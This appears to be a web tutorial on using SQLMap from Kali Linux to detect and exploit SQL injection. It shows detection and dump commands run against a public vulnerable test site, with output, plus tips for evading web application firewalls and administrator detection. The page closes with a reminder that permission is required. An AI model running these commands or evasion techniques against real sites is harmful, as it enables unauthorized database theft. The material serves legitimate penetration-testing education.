top of page

Hack any Website - SQLMap Tutorial on Kali Linux

Nearly 45.8% of websites on internet are built on WordPress Content Management System. Wordpress CMS uses a backend MySQL database to store the website data. Hacking the Wordpress website means gaining access to this database in an unauthorized way. When a hacker gets access to the database without knowing the database login credentials, they may execute any SQL command that exposes the data stored in the database to the public. SQLMap is one such tool that is used by hackers to perform this activity. In this SQLMap tutorial, we provide in depth explanation on how hackers use the SQLMap tool on Kali Linux to hack any website.


This SQLMap tutorial is divided into below sections. You can jump directly to any section if you want.



What is Kali Linux?

Kali Linux is just a Linux distribution similar like Ubuntu, Parrot Linux or Black Arch. However, this Linux distribution is specially made for convenience use by Ethical hackers & Penetration testers.


Official Logo of Kali Linux
Official Logo of Kali Linux

Kali Linux comes with many pre-bundled ethical hacking tools in it by default. The tools comes preconfigured and are ready for use by the user. The complete list of in-build Kali tools can be found here.


What is SQLMap?

SQLMap is an open source tool used by Ethical hackers and Penetration testers for detecting and exploiting the SQL Injection (SQLi) vulnerabilities.


With SQL Injection vulnerability, hackers can manipulate and dump the database data causing a big reputation and financial loss to an organization. When hacker gets the access to the website database, the website is said to be hacked.


For hackers and penetration testers, SQLMap is the goto choice for working with SQLi vulnerabilities. This is because, it helps you from detection to exploitation of SQLi vulnerability without need of any other external tool. In addition, it comes preinstalled with Kali Linux.


How to install SQLMap on Kali Linux (If it's not there) ?

On Kali Linux and other Linux distros like Parrot Linux and Black Arch, SQLMap comes pre-installed. You can check whether it's installed or not using below command -

sqlmap -v

It gives you output like below with a SQLMap Banner -


SQLMap Banner on Kali Linux
SQLMap Banner on Kali Linux

If by any chance you remove the default shipped SQLMap on Kali Linux, please follow below steps to install it freshly.

 

Installing the SQLMap prerequisite (If SQLMap is not installed)

Python3 is the only prerequisite for SQLMap. Check if you already have Python3 installed using below command-

Python3 -v

If above command don't show any python version, then please install the python using below steps-

Steps to Install Python3

For Debian based Linux like Kali Linux, Ubuntu, Lubuntu, Kubuntu, use below command to install Python3:

sudo apt install python3

In Red hat based Linux like Fedora, Centos, use below command -

sudo rpm install python3
 

Installing the SQLMap Package

Step 1: Download the SQLMap

Download the SQLMap .tar file from official Git repository of SQLMap.

wget 'https://github.com/sqlmapproject/sqlmap/tarball/master' -O sqlmap.tar.gz

Step 2: Untar the SQLMap Tar file

Run the below command to extract your SQLMap package from the tar file.

tar -xvf sqlmap.tar.gz

Step 3: Running the SQLMap

Now, move into the directory where you extracted the SQLMap. And give the below command to test whether its installed properly or not -

Python sqlmap.py -h

It should show SQLMap banner as like below. If you see this, then SQLMap is installed properly on your Kali Linux instance -



SQLMap tutorial:  Banner on Kali Linux
SQLMap tutorial: Banner on Kali Linux

Steps to Hack any Website using SQLMap

For any website, there has to be a backend database that stores the data. When there is a database, there comes the SQL and hence the chances of occurrence of SQL Injection vulnerability.


With SQLMap, if we have to hack any website, then we need to detect whether the given website is vulnerable to SQL Injection attack or not. And, the good thing is that SQLMap itself will help us through this detection phase.


So, we will follow below 2 steps to hack any website using SQLMap on Kali Linux -

  1. Check if website is vulnerable to SQL Injection (Using SQLMap)

  2. Exploit the vulnerable endpoint to hack the website database (Again Using SQLMap)


In next section, we will look at those Detection Commands and Enumeration Commands in detail with their syntax and examples.


SQLMap Tutorial: Kali Linux commands

Now, as the SQLMap is installed and running fine, let's now proceed towards various SQLMap commands that can be executed on Kali Linux.


SQLMap commands can be classified under 2 categories viz. Detection commands that helps us detect the presence of SQLi vulnerability and Enumeration commands that helps us exploit the detected SQLi vulnerability.


Let's have a look at them one by one. For this tutorial, we will use SQL Injection test site Acunetix Vulnweb.


Detection Commands Tutorial: SQLMap Kali Linux

Detection commands helps to detect SQLi vulnerability in an application.


sqlmap -p : Specify which parameter to probe

-p parameter is used to specify which of the available input parameter needs to be tested for SQLi.


sqlmap -u : Specify parameter in GET Request

The above command will inject SQLi payloads in the GET parameter named "cat". Below is the output of above command:

[18:56:54] [INFO] heuristic (basic) test shows that GET parameter 'cat' might be injectable (possible DBMS: 'MySQL')
[18:56:54] [INFO] heuristic (XSS) test shows that GET parameter 'cat' might be vulnerable to cross-site scripting (XSS) attacks
[18:56:54] [INFO] testing for SQL injection on GET parameter 'cat'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

sqlmap --data: Specify parameter in POST request

Similar to GET request, you can also specify which parameter you want to test for SQL Injection using SQLMap. To make a POST request with a body, use --data parameter.

You can use -p parameter exactly the same way as GET request.


Example:

sqlmap -u "http://example.com/login" --data="username=test&password=test" -p username

sqlmap -r : Run SQLMap with Burp suite request captured in a file

Using the -r flag, we can run SQLMap on the already captured requests in a text file or requests that are captured in any external tools like postman.


This can also be a request captured by burp suite interceptor. Below is an example of a Burp suite captured request:

GET /api/endpoint1.php HTTP/1.1
Host: test.app.com
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

You can just save this http request in a text file and then feed it to SQLMap using the -r switch as below.


Example:

sqlmap -r burp-request.txt -p cat --dump

When to use sqlmap -r command:

The -r parameter is useful option while running SQLMap on any endpoint that requires cookie based authentication.


In cookie based authentications, the http request must carry the appropriate cookie headers that are set by the target servers. The server sets the cookie when the user is authenticated (like after entering correct userid and password). When you intercept the request using burp suite, it has the appropriate cookie headers in it.


Use *: Test deeply nested parameters in JSON/XML Payloads

Sometimes, the API consumes nested JSON object as like below:

{
    "Boss" : "John",
    "Department" : "Finance",
    "Department id": 3,
    "employees":[
        {
            "name":"Shaun",
            "age": 30
        },
        {
            "name":"Paul",
            "age" : 27
        }
    ]
}

Now, if we have to test the "age" field in above JSON for SQL Injection, we will use the "*" option.


Again, to deal with bigger JSON structures like this, it becomes easier if we store the request in a text file and then feed the file using the -r switch (as we explained in previous command).


.....
    "name":"Paul",
    "age" : 27*
}

Enumeration commands: SQLMap Kali Linux

Enumeration commands helps to enumerate over the database using the detected SQLi endpoint. Let's see all enumeration commands in action -


sqlmap --banner : Fingerprint the Database Management System

Use the --banner flag to dump the database banner that helps us fingerprint database management system.


Example:

python sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=2" -p cat --banner

Output:

[18:27:39] [INFO] the back-end DBMS is MySQL
[18:27:39] [INFO] fetching banner
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.1
banner: '8.0.22-0ubuntu0.20.04.2'

As you can see, we have successfully fingerprinted the database server and dumped its version, the underlying operating system and the DBMS type.


sqlmap --dump: Dumping all tables data

Once you identify any vulnerable parameter using -p command, you can use --dump command so as to dump all tables data.


Example of --dump command -

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=2" -p cat --dump

Below is an output:



As you can see, SQLMap has itself enumerated over available database schemas and now dumping each table 1 by 1 (Tables in screenshot appears empty though as they don't have any entries).


Dump specific pieces of data

Dumping all tables data using --dump command might take time (depending on its size). Sometimes, for penetration testers or ethical hackers, a simple POC that demonstrates some data leak is enough as a proof that a vulnerability is present and needs to be fixed on high priority.


Instead of dumping full tables data, SQLMap can dump only the names of database tables, schemas, database users, roles and many more. Let's have a look at those one by one.


sqlmap --tables: Dump names of database tables

Use --tables switch.

Example:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=2" -p cat --tables

The above command will just list tables names as below -


Once you know database table names, you can scan through the list and select any table that contains very sensitive data like session tokens, passwords or api keys.


However, sometimes tables are too large to dump. Let's see how to speed it up next.


sqlmap --users & sqlmap --roles: Dump names of database users and roles

Use --roles and --users switch.

Example:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=2" -p cat --users --roles

Output:


As you can see, SQLMap has listed the names of database users and then listed the role names as instructed.


How to Speed up the Table dump in SQLMap?

Dumping a full table sometimes can become difficult as table might contain huge number of entries with many number of columns.


Option 1: Dump only specific columns rather than all columns

You can speed up the dumping process by dumping only the specific columns.


This way you can avoid any unimportant columns such as timestamp columns (which contains less sensitive data).


To achieve specific column dump, let's first find out names of all columns in a table using the --columns flag. You need to supply table name using -T flag.


Example:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=2" -p cat -T artists --columns

Output:

[16:56:25] [INFO] fetching current database
[16:56:25] [INFO] fetching columns for table 'artists' in database 'acuart'
Database: acuart
Table: artists
[3 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| adesc     | text        |
| aname     | varchar(50) |
| artist_id | int         |
+-----------+-------------+

As can be seen above, SQLMap has dumped the columns names of table 'artists'. Now, you can just dump data from specific columns as below -

python sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=2" -p cat -T artists -C aname --dump

In above command, we selected to dump column "aname" of table "artists". Here's how the SQLMap shows the output-

[17:06:56] [INFO] fetching entries of column(s) 'aname' for table 'artists' in database 'acuart'
Database: acuart
Table: artists
[3 entries]
+---------+
| aname   |
+---------+
| r4w8173 |
| Blad3   |
| lyzae   |
+---------+

This way, we can speed up our process by dumping only the sensitive piece of data for creating a POC.


Option 2: Run SQLMap Multithreaded

Using --threads switch you can specify how many concurrent http requests should be fired by SQLMap.


The max limit for this parameter is 10.


Specially in Time based SQL Injection, where dumping the data can take huge time, the --threads option will help speed up the process.


Let's see the use of --threads in action -

python sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=2" -p cat --technique=T --dump --threads=10

In above command, we purposely asked SQLMap to use Time based SQL Injection method only and dump the data using 10 concurrent threads.


Here's how the SQLMap output looks like -


As you can see, when used multithreaded approach, SQLMap first tries to find length of the query output and then assign multiple threads of execution to different characters in the query output.


SQLMap Cheatsheet: Bypass WAF while using SQLMap


Website administrators are getting more security conscious day by day. For adding security to a website, various plug and play web security solutions exists that makes the life easier for website admins. One such solutions that is widely used by community is Web Application Firewalls (aka. WAFs).


A Web Application Firewall (is also a type of Web application and acts a proxy server) monitors all incoming traffic to a website. WAF knows which requests are made by genuine users and which requests are made for performing malicious hacking attempts.


Examples of such WAFs are Cloudflare, Akamai and AWS WAF.


When there is a WAF, SQLMap surrenders. It can't proceed. Reason is, SQLMap fires its SQL Injection payloads (which are first captured by WAF) and WAF immediately flag the requests as a malicious request and don't let it reach the actual web application.


Fortunately, SQLMap has inbuilt support for tackling with almost 80 different WAFs. It is enabled by default. SQLMap will purposely make a malicious http request just to detect which WAF is in use. After detecting the WAF type, it applies the necessary requests alterations so as to sneak through SQLi payloads.


The --skip-waf flag

Just in case, you don't want to use SQLMap's inbuilt WAF defending mechanism, you can disable it using --skip-waf option.


Example:

python sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=2" -p cat --technique=T --skip-waf

SQLMap Cheatsheet: Tips and Tricks

Here's some tips from BUZZ experts in order to make full use of SQLMap with ease.


Use Custom User-Agent

SQLMap allows you to set a custom User-Agent using the --random-agent option to mimic various browsers


Delay Requests

Use --delay to set delays between requests, reducing the chance of detection by WAF/Website admins.


Tamper Scripts

Explore tamper scripts (--tamper) to modify requests and evade WAFs. Though SQLMap offers some inbuilt mechanism for WAF bypass, it's not full proof. Custom tamper scripts will be helpful in such cases.


Proxy Support

Employ proxy chains (--proxy) for anonymized testing.


Update Regularly

SQLMap comes with new versions regularly with lots of improvements. It's good to always stay up to date with latest improvements.(use --update) flag.


Make use of --Risk and --Level

The default values of Risk and Level flags creates bearable load on web servers. This also means, that some SQLi vulnerable endpoints might get sneak through this bearable load. You can change the risk and level values and detect such corner case endpoints.


Most Important: Take Permission from Site Owner

It is illegal to use SQLMap on any website without taking the permission of site owner. SQLMap is a tool for penetration testers and ethical hackers. So, it is meant for an ethical use.


Any use of SQLMap without knowledge of Website owner is considered as illegal. The SQLMap itself warns you every time about this as highlighted below:

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.7.12.7#dev}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Conclusion

Kali Linux has plenty of tools for ethical hackers. However, SQLMap is one such tool that creates a huge impact as its around SQL Injection vulnerabilities. You can hack any website by hacking its database using SQLMap. It's a free tool and widely acknowledged by InfoSec community.


With great powers, comes great responsibility. Use SQLMap with permissions of site owner and off-course for testing purpose only.


bottom of page